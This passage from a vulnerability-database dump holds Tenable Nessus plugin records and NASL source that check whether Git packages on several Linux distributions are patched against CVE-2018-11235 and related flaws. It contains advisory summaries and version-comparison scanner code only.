exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"git-2.17.1-2.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T12:40:21", "description": "According to the versions of the git packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : git (EulerOS-SA-2019-1385)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000117", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1385.NASL", "href": "https://www.tenable.com/plugins/nessus/124888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124888);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000117\",\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : git (EulerOS-SA-2019-1385)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling\n of 'ssh' URLs has been discovered in Git. An attacker\n could use this flaw to execute shell commands with the\n privileges of the user running the Git client, for\n example, when performing a 'clone' action on a\n malicious repository or a legitimate repository\n containing a malicious commit.(CVE-2017-1000117)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1385\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51d87829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2017-1000117');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n \"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:58", "description": "New git packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : git (SSA:2018-152-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:git", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2018-152-01.NASL", "href": "https://www.tenable.com/plugins/nessus/110308", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-152-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110308);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"SSA\", value:\"2018-152-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : git (SSA:2018-152-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.582338\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?507f1b36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.14.4\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"2.17.1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.17.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:43:57", "description": "An update of the git package has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Git PHSA-2018-2.0-0053", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0053_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/121953", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0053. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121953);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Photon OS 2.0: Git PHSA-2018-2.0-0053\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-53.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-debuginfo-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-debuginfo-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-lang-2.17.1-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"git-lang-2.17.1-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:09", "description": "Etienne Stalmans discovered that git did not properly validate git submodules files. A remote attacker could possibly use this to craft a git repo that causes arbitrary code execution when 'git clone\n--recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname sanity checking code when used on NTFS filesystems. An attacker could use this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : git vulnerabilities (USN-3671-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:git", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-3671-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110395", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3671-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110395);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"USN\", value:\"3671-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 / 18.04 LTS : git vulnerabilities (USN-3671-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Etienne Stalmans discovered that git did not properly validate git\nsubmodules files. A remote attacker could possibly use this to craft a\ngit repo that causes arbitrary code execution when 'git clone\n--recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname\nsanity checking code when used on NTFS filesystems. An attacker could\nuse this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3671-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"git\", pkgver:\"1:1.9.1-1ubuntu0.8\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"git\", pkgver:\"1:2.7.4-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"git\", pkgver:\"1:2.14.1-1ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"git\", pkgver:\"1:2.17.1-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:31", "description": "This update for git to version 2.16.4 fixes several issues. These security issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2018:1872-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", 